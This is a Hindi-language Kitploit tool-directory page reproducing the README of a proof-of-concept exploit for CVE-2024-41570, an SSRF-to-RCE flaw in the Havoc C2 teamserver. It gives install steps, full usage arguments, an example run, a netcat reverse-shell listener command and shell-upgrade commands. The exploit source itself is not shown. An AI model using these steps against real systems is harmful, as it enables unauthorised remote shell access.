Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-41570 — WebSocket के माध्यम से स्वचालित रिवर्स शेल शोषण | Havoc-C2-SSRF RCE के साथ | Kitploit
उपकरण/GitHubGitHub/diemoeve/cve-2024-41570
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरेड टीमिंगरिमोट एक्सेस टूल
GitHubdiemoeve/cve-2024-41570

CVE-2024-41570

WebSocket के माध्यम से स्वचालित रिवर्स शेल शोषण | Havoc-C2-SSRF RCE के साथ

रिपॉजिटरी देखें
1221 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-41570 | Havoc C2 SSRF के साथ RCE | वेबसॉकेट के माध्यम से स्वचालित रिवर्स शेल एक्सप्लॉइट

यह प्रोजेक्ट एक कमजोर वेबसॉकेट-आधारित सेवा का शोषण करने के लिए एक Python-आधारित प्रूफ-ऑफ-कॉन्सेप्ट (PoC) स्क्रिप्ट प्रदान करता है। यह स्क्रिप्ट एजेंट पंजीकरण, वेबसॉकेट पेलोड वितरण और रिवर्स शेल स्थापित करने के लिए दूरस्थ कमांड निष्पादन को स्वचालित करती है।

विशेषताएँ

  • लक्ष्य सेवा में एक एजेंट पंजीकृत करता है।
  • एक WebSocket खोलता है और हैंडशेक और प्रमाणीकरण पेलोड भेजता है।
  • रिवर्स शेल के माध्यम से दूरस्थ रूप से कमांड निष्पादित करता है।
  • स्पष्ट निर्देशों के साथ एक निर्देशित कार्यप्रवाह प्रदान करता है।

पूर्वापेक्षाएँ

  • आपकी मशीन पर Python 3.x स्थापित हो।
  • निम्नलिखित चलाकर आवश्यक निर्भरताएँ स्थापित करें:
    root@kitploit:~
    pip install -r requirements.txt
    

स्थापना

  1. इस रिपॉजिटरी को क्लोन करें:
    root@kitploit:~
    git clone https://github.com/kit4py/CVE-2024-41570.git
    
  2. प्रोजेक्ट निर्देशिका में जाएं:
    root@kitploit:~
    cd CVE-2024-41570
    
  3. निर्भरताएँ स्थापित करें:
    root@kitploit:~
    pip install -r requirements.txt
    

उपयोग

आवश्यक तर्कों के साथ स्क्रिप्ट चलाएं:

root@kitploit:~
python3 exploit.py -t <target_url> -i <teamserver_ip> -p <teamserver_port> -U <username> -P <password> -l <listener_ip> -L <listener_port>

तर्क

  • -t: WebSocket सर्वर का लक्ष्य URL।
  • -i: Havoc से टीम सर्वर का IP पता।
  • -p: Havoc से टीम सर्वर के लिए पोर्ट।
  • -U: WebSocket प्रमाणीकरण के लिए उपयोगकर्ता नाम।
  • -P: WebSocket प्रमाणीकरण के लिए पासवर्ड।
  • -l: रिवर्स शेल के लिए लिसनर IP (आपकी मशीन)।
  • -L: रिवर्स शेल के लिए लिसनर पोर्ट (आपकी मशीन)।

उदाहरण कमांड

root@kitploit:~
python3 exploit.py -t http://example.com -i 127.0.0.1 -p 40056 -U 'havocuser' -P 'password123' -l 192.168.1.2 -L 4444

निष्पादन के चरण

  1. सुनिश्चित करें कि लक्ष्य सेवा चल रही है और कमजोर है।
  2. आवश्यक पैरामीटर के साथ स्क्रिप्ट चलाएं।
  3. एक अलग टर्मिनल में, एक लिसनर शुरू करें:
    root@kitploit:~
    nc -lvnp <listener_port>
    
  4. शेल को अपग्रेड करें:
    root@kitploit:~
    python -c 'import pty; pty.spawn("/bin/bash")' 
    export TERM=xterm-256color
    stty rows 67 columns 318
    

निर्भरताएँ

स्क्रिप्ट को निम्नलिखित Python लाइब्रेरीज़ की आवश्यकता है:

  • requests
  • pycryptodome

उन्हें इस कमांड का उपयोग करके स्थापित करें:

root@kitploit:~
pip install -r requirements.txt

सुरक्षा सूचना

यह स्क्रिप्ट केवल शैक्षिक उद्देश्यों के लिए है। सुनिश्चित करें कि आपके पास लक्ष्य सिस्टम का परीक्षण करने की स्पष्ट अनुमति है। इस स्क्रिप्ट के दुरुपयोग से कानून और नैतिक दिशानिर्देशों का उल्लंघन हो सकता है।

संदर्भ

Default Havoc Poc से प्रेरित

योगदान

योगदान का स्वागत है! रिपॉजिटरी को फोर्क करने और पुल रिक्वेस्ट सबमिट करने में संकोच न करें।

लाइसेंस

यह प्रोजेक्ट MIT लाइसेंस के तहत लाइसेंस प्राप्त है। विवरण के लिए LICENSE फ़ाइल देखें।

टूल डाउनलोड करें